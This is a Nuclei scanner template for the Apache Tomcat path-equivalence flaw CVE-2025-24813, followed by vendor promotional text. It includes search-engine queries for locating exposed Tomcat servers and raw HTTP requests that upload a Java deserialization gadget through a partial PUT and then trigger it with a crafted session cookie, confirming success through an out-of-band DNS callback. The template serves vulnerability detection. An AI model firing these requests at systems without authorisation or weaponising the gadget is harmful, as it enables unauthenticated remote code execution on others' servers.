id: CVE-2025-24813
info:
name: Apache Tomcat Path Equivalence - Remote Code Execution
author: iamnoooob,rootxharsh,pdresearch,theMiddle
severity: critical
description: |
Path Equivalence- 'file.Name' (Internal Dot) leading to Remote Code Execution and/or Information disclosure and/or malicious content added to uploaded files via write enabled Default Servlet in Apache Tomcat.
impact: |
Unauthenticated attackers can exploit path equivalence issues to upload malicious files and execute arbitrary code, leading to complete server compromise and potential data exfiltration.
remediation: |
Users are recommended to upgrade to version 11.0.3, 10.1.35 or 9.0.98, which fixes the issue.
reference:
- https://scrapco.de/blog/analysis-of-cve-2025-24813-apache-tomcat-path-equivalence-rce.html
- https://lists.apache.org/thread/j5fkjv2k477os90nczf2v9l61fb0kkgq
- http://www.openwall.com/lists/oss-security/2025/03/10/5
- https://nvd.nist.gov/vuln/detail/CVE-2025-24813
- https://security.netapp.com/advisory/ntap-20250321-0001/
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
cve-id: CVE-2025-24813
cwe-id: CWE-44,CWE-502
epss-score: 0.99945
epss-percentile: 0.99971
cpe: cpe:2.3:a:apache:tomcat:*:*:*:*:*:*:*:*
metadata:
verified: true
max-request: 3
vendor: apache
product: tomcat
shodan-query:
- http.component:"apache tomcat"
- cpe:"cpe:2.3:a:apache:tomcat"
- http.html:"apache tomcat"
- http.html:"jk status manager"
- http.title:"apache tomcat"
- product:"tomcat"
fofa-query:
- server=="apache tomcat"
- body="apache tomcat"
- body="jk status manager"
- title="apache tomcat"
google-query:
- intitle:"apache tomcat"
- site:*/examples/jsp/snp/snoop.jsp
tags: cve,cve2025,apache,tomcat,rce,intrusive,kev,vkev,vuln
flow: http(1) && http(2)
variables:
filename: "{{randbase(6)}}"
http:
- raw:
- |
GET / HTTP/1.1
Host: {{Hostname}}
redirects: true
matchers:
- type: word
part: header
words:
- "Apache"
internal: true
- raw:
- |
PUT /{{filename}}.session HTTP/1.1
Host: {{Hostname}}
Content-range: bytes 0-452/457
{{generate_java_gadget("dns", "http://{{interactsh-url}}", "raw")}}
- |
GET /{{filename}} HTTP/1.1
Host: {{Hostname}}
Cookie: JSESSIONID=.{{filename}}
matchers-condition: and
matchers:
- type: word
part: interactsh_protocol
words:
- "dns"
- type: status
status:
- 201
# digest: 4a0a0047304502210096e00f825d32c598c50fca22f7c7203486d5d8fa1d3a7e6da2e569599d19fb38022033a449fa7358a6f276cca500ba3fcf8ce5a4579efb4cdb0023780fd759495f1f:922c64590222798bb761d5b6d8e72950Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation